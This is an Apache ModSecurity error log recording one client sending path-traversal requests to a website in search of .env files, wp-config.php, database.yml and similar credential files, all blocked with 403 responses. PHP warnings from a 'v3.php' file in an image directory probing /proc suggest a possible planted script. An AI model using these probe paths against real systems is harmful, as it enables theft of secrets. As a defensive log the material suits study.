[Tue May 12 06:16:52.144398 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKptBfeipD4uoG21FpAUwAAABI"]
[Tue May 12 06:16:52.144628 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKptBfeipD4uoG21FpAUwAAABI"]
[Tue May 12 06:16:52.632685 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKptBfeipD4uoG21FpAUwAAABI"]
[Tue May 12 06:16:52.664092 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKptBfeipD4uoG21FpAVQAAABI"]
[Tue May 12 06:16:52.664167 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKptBfeipD4uoG21FpAVQAAABI"]
[Tue May 12 06:16:52.664333 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKptBfeipD4uoG21FpAVQAAABI"]
[Tue May 12 06:16:53.160644 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKptBfeipD4uoG21FpAVQAAABI"]
[Tue May 12 06:16:53.192330 2026] [core:error] [pid 1808852:tid 1808873] [client 45.148.10.166:30324] AH10244: invalid URI path (/media../../../.env)
PHP Warning:  filesize(): stat failed for /proc/16/task/16/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/16/task/16/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/16/task/16/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/16/task/16/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/16/task/16/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/16/task/16/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:16:53.737973 2026] [core:error] [pid 1825287:tid 1825308] [client 45.148.10.166:30340] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 06:16:54.319045 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpths7kySIUZ3ORnI1kgAAAQg"]
[Tue May 12 06:16:54.319141 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpths7kySIUZ3ORnI1kgAAAQg"]
[Tue May 12 06:16:54.319312 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKpths7kySIUZ3ORnI1kgAAAQg"]
[Tue May 12 06:16:54.779415 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpths7kySIUZ3ORnI1kgAAAQg"]
[Tue May 12 06:16:54.809762 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpths7kySIUZ3ORnI1kwAAAQg"]
[Tue May 12 06:16:54.809831 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpths7kySIUZ3ORnI1kwAAAQg"]
[Tue May 12 06:16:54.810010 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKpths7kySIUZ3ORnI1kwAAAQg"]
[Tue May 12 06:16:55.278266 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpths7kySIUZ3ORnI1kwAAAQg"]
[Tue May 12 06:16:55.308766 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKptxs7kySIUZ3ORnI1lQAAAQg"]
[Tue May 12 06:16:55.308842 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKptxs7kySIUZ3ORnI1lQAAAQg"]
[Tue May 12 06:16:55.309050 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKptxs7kySIUZ3ORnI1lQAAAQg"]
[Tue May 12 06:16:55.772839 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKptxs7kySIUZ3ORnI1lQAAAQg"]
[Tue May 12 06:16:55.803264 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKptxs7kySIUZ3ORnI1lgAAAQg"]
[Tue May 12 06:16:55.803463 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKptxs7kySIUZ3ORnI1lgAAAQg"]
[Tue May 12 06:16:56.294117 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKptxs7kySIUZ3ORnI1lgAAAQg"]
[Tue May 12 06:16:56.324115 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpuBs7kySIUZ3ORnI1lwAAAQg"]
[Tue May 12 06:16:56.324314 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/settings.py"] [unique_id "agKpuBs7kySIUZ3ORnI1lwAAAQg"]
[Tue May 12 06:16:56.785189 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpuBs7kySIUZ3ORnI1lwAAAQg"]
[Tue May 12 06:16:56.816999 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpuBs7kySIUZ3ORnI1mQAAAQg"]
[Tue May 12 06:16:56.817202 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKpuBs7kySIUZ3ORnI1mQAAAQg"]
[Tue May 12 06:16:57.283841 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpuBs7kySIUZ3ORnI1mQAAAQg"]
[Tue May 12 06:16:57.314306 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /uploads../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpuRs7kySIUZ3ORnI1mgAAAQg"]
[Tue May 12 06:16:57.314374 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpuRs7kySIUZ3ORnI1mgAAAQg"]
[Tue May 12 06:16:57.314530 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKpuRs7kySIUZ3ORnI1mgAAAQg"]
[Tue May 12 06:16:57.786760 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpuRs7kySIUZ3ORnI1mgAAAQg"]
[Tue May 12 06:16:57.820756 2026] [core:error] [pid 1842385:tid 1842398] [client 45.148.10.166:30356] AH10244: invalid URI path (/uploads../../../.env)
[Tue May 12 06:16:58.451004 2026] [core:error] [pid 1825179:tid 1825209] [client 45.148.10.166:60158] AH10244: invalid URI path (/uploads../../../../.env)
